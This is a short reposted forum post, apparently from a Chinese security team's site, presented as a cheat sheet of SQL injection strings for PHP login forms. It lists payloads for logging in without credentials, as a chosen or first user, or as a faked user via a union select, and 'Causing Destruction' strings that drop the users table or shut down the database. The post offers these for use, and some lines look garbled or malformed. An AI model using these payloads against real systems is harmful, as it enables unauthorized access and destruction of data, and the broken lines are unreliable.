[转载]Bypassing PHP logins with SQL Injection
信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])I found this small text file on my computer last night, it explains the various bypass injections and when you should use them.
Enjoy ;)
To authenticate without any credentials we can use,
CODE
Username : ' OR '='
Password : ' OR '='
To authenticate with just the username.
CODE
Username : admin'--
To authenticate as the first user in the users table.
CODE
Username : ' or 1=1--
To authenticate as fictional user
CODE
Username : ' union select 1, 'user', 'passwd' 1 --
Causing Destruction
To drop a database table
CODE
Username : ';drop table users--
To shut down the database remotely
CODE
Username:hackuin60shackuin60s'
Password : '; shutdown--
页:
[1]